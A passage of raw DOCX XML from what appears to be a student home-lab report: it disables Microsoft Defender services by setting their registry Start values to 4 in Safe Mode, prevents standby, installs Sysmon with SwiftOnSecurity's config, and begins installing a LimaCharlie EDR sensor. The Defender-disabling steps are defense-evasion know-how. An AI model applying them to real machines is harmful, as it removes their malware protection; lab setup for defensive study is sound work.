          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CurrentControlSet\Services\WinDefend</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\SYSTEM\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>CurrentControlSet\Services\WdNisDrv</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\SYSTEM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\CurrentControlSet\Services\WdNisSvc</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Computer\HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WdFilter</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For each key, find the "Start" value and change it to </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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5761990" cy="3562985"/>
            <wp:effectExtent l="0" t="0" r="10160" b="1841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61990" cy="3562985"/>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val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="60"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425"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Exit Safe Mode:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left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Re-trace the steps as did earlier to enter Safe mode.</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Restart the system to exit Safe Mode and return to the normal desktop environment.</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IN"/>
        </w:rPr>
        <w:t xml:space="preserve">5.3.5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Prevent Standby Mode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>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From an administrative command prompt, prevent the VM from going into sleep/standby mode during operations by running the following commands:</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standby-timeout-ac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standby-timeout-dc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monitor-timeout-ac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monitor-timeout-dc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hibernate-timeout-ac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powercfg /change hibernate-timeout-dc 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6"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>5.3.6 Configure Sysmon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>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To enhance system monitoring and log critical system activities, install Sysmon (System Monitor) along with a pre-configured Sysmon configuration provided by SwiftOnSecurity. Follow these steps to install Sysmon and validate its installation:</w:t>
      </w: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Download Sysmon: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Open an administrative Windows PowerShell session.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Download the Sysmon zip file using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>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Invoke-WebRequest -Uri https://download.sysinternals.com/files/Sysmon.zip -OutFile C:\Windows\Temp\Sysmon.zip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Unzip Sysmon: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Extract the contents of the Sysmon zip file using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>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Expand-Archive -LiteralPath C:\Windows\Temp\Sysmon.zip -DestinationPath C:\Windows\Temp\Sysmon</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Download Sysmon Configuration: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Download SwiftOnSecurity’s Sysmon configuration using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Invoke-WebRequest -Uri https://raw.githubusercontent.com/SwiftOnSecurity/sysmon-config/master/sysmonconfig-export.xml -OutFile C:\Windows\Temp\Sysmon\sysmonconfig.xml</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Install Sysmon with Swift’s Configuration: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Install Sysmon with SwiftOnSecurity’s configuration using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>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C:\Windows\Temp\Sysmon\Sysmon64.exe -accepteula -i C:\Windows\Temp\Sysmon\sysmonconfig.xml</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527040" cy="1903095"/>
            <wp:effectExtent l="0" t="0" r="16510" b="190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5"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5527040" cy="190309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Validate Sysmon Installation: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Check if the Sysmon64 service is installed and running with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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Get-Service sysmon64</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512435" cy="1071880"/>
            <wp:effectExtent l="0" t="0" r="12065" b="13970"/>
            <wp:docPr id="10" name="Picture 5" descr="C:\Users\Abdul\Desktop\Mini\WhatsApp Image 2024-02-29 at 19.25.07_2bc7df17.jpgWhatsApp Image 2024-02-29 at 19.25.07_2bc7d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Users\Abdul\Desktop\Mini\WhatsApp Image 2024-02-29 at 19.25.07_2bc7df17.jpgWhatsApp Image 2024-02-29 at 19.25.07_2bc7df17"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:srcRect l="3296" t="17447" r="11533"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5512435" cy="1071880"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="61"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425"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Check Sysmon Event Logs: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Verify the presence of Sysmon Event Logs to ensure proper functionality:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Get-WinEvent -LogName "Microsoft-Windows-Sysmon/Operational" -MaxEvents 10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46725" cy="1642110"/>
            <wp:effectExtent l="0" t="0" r="15875" b="15240"/>
            <wp:docPr id="11" name="Picture 11" descr="C:\Users\Abdul\Desktop\Mini\WhatsApp Image 2024-02-29 at 19.36.19_2e61ef7f.jpgWhatsApp Image 2024-02-29 at 19.36.19_2e61e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bdul\Desktop\Mini\WhatsApp Image 2024-02-29 at 19.36.19_2e61ef7f.jpgWhatsApp Image 2024-02-29 at 19.36.19_2e61ef7f"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:srcRect l="4421" t="20172" r="5365" b="5777"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5546725" cy="164211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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Installing LimaCharlie EDR and Configuring Sensor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>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LimaCharlie EDR (Endpoint Detection and Response) is a comprehensive security platform that offers cross-platform EDR capabilities along with log shipping and threat detection engine. </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Creat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> LimaCharlie Account and Organization:</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Sign up for a free LimaCharlie account and complete the necessary formalities.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Creat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> a new organization within the LimaCharlie platform.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>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5290" cy="5771515"/>
            <wp:effectExtent l="0" t="0" r="10160" b="635"/>
            <wp:docPr id="12" name="Picture 12" descr="C:\Users\Abdul\Pictures\Screenshots\Screenshot 2024-03-01 163920.pngScreenshot 2024-03-01 1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bdul\Pictures\Screenshots\Screenshot 2024-03-01 163920.pngScreenshot 2024-03-01 163920"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:srcRect t="306" b="306"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5495290" cy="577151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Add</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Sensor:</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Upon organization creation, select "Add Sensor"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> from dashboard,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rovide a descriptive identifier such as "Windows VM - Lab" and proceed to create the sensor. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5589270" cy="1612265"/>
            <wp:effectExtent l="0" t="0" r="11430" b="698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9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5589270" cy="1612265"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>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val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Choosen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>the x86-64 (.exe) sensor for Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>11.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4398010" cy="5268595"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="15" name="Picture 15" descr="20705fe4-b15a-480d-9799-684d04edcaa2_627x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705fe4-b15a-480d-9799-684d04edcaa2_627x751"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4398010" cy="5268595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w: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Installing LimaCharlie Sensor on Windows11 VM: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From an</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Administrative PowerShell prompt within the Windows11 VM</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>, f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>etch the LimaCharlie sensor using command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> line:</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cd C:\Users\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>\Downloads</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>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Invoke-WebRequest -Uri https://downloads.limacharlie.io/sensor/windows/64 -Outfile C:\Users\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Monospace" w:hAnsi="Monospace" w:eastAsia="Monospace" w:cs="Monospace"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>\Downloads\lc_sensor.exe</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1"/>
          <w:szCs w:val="21"/>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Subsequently, execute</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the prescribed command from the LimaCharlie sensor page to finalize the sensor installation process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="SimSun" w:hAnsi="SimSun" w:eastAsia="SimSun" w:cs="SimSun"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
